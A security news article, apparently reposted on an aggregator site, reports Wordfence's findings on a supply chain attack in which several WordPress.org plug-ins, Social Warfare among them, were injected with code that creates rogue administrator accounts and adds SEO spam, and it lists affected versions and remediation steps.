WordPress Supply Chain Attack Spreads Across Multiple Plug-ins

Injected malicious JavaScript code gives attackers administrator rights on websites, and fills sites with SEO spam.

A threat actor or actors has compromised
multiple plug-ins
on the WordPress.org site with code aimed at giving attackers administrative privileges as well as conducting further malicious activity.
WordPress.orgs Plug-in Review team warned users on Monday that a plug-in called
Social Warfare
was infected by malicious code, according to a forum post. After noticing the post, Wordfence researchers did some follow-up and discovered that there were several more WordPress.org
plug-ins
injected with the same code, according to
a blog post
published by Wordfence on June 24.
In addition to Social Warfare, versions 4.4.6.4 and 4.4.7.1, the affected plug-ins include:
Blaze Widget
v2.2.5 to 2.5.2;
Wrapper Link Element
v1.0.2 to 1.0.3;
Contact Form 7 Multi-Step Addon
v1.0.4 to 1.0.5; and
Simply Show Hooks
v1.2.1.
Of the plug-ins, Social Warfare (a social-media-themed offering) has the most installations, with more than 30,000; the rest reached no more than hundreds at the most. Still, the presence of the same malicious code across all of them should raise alarm bells, as it suggests attempts at a larger supply chain attack, according to Wordfence.
Social Warfare has been patched in version 4.4.7.3; however, it and all of the affected plug-ins have been delisted and are unavailable for download, at least temporarily, though WordPress.org did not respond when Wordfence reached out about its discovery.
None of the other plug-ins currently have a patched version; however, someone has removed the malicious code from Wrapper Link Element in a current version thats been tagged as 1.0.0, which is lower than the infected versions and thus may make it difficult for users to update, according to Wordfence.
The malicious code injected in the plug-ins attempts to create a new administrative user account and then sends those details back to the attacker-controlled server located at 94.156.79.8, Wordfence threat intelligence lead Chloe Chamberland wrote in the post. The campaign also uses the plug-ins to inject malicious JavaScript into the footer of websites and to add SEO spam throughout it, she said.
The injected malicious code is not very sophisticated or heavily obfuscated and contains comments throughout making it easy to follow, Chamberland added.
The origin of the attack was likely June 21, and attackers were still updating plug-ins about five hours before WordFence published its post on the attack on June 24. The researchers still dont know exactly how the infection began, and is performing a deeper analysis with updates to follow, she said.
Due to its widespread use as a foundation for websites, the
WordPress platform
and its plug-ins especially are a notoriously popular target for threat actors, giving them easy access to a broad attack surface. Typically, attackers target
singular plug-ins
with large install bases; however, the new attack suggests that attackers now may be eyeing more ambitious supply chain attacks across multiple plug-ins to broaden the impact of malicious campaigns, according to Wordfence.
As such an attack demands greater vigilance, Wordfence — which focuses on the security of the
WordPress platform
— is actively working on a set of malware signatures to provide detection for these compromised plug-ins. In the meantime, anyone using any of the plug-ins should remove them from any websites immediately and go into incident-response mode, Chamberland said.
We recommend checking your WordPress administrative user accounts and deleting any that are unauthorized, along with running a complete malware scan to remove any malicious code, she said.
Wordfence also included in the post various indicators of compromise (IoCs) — including known usernames associated with attacker-controlled admin accounts — that WordPress administrators can use to identify evidence of the campaign. Also included is a link to a guide that provides advice on how to clean WordPress-based websites of malicious code.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
WordPress Supply Chain Attack Spreads Across Multiple Plug-ins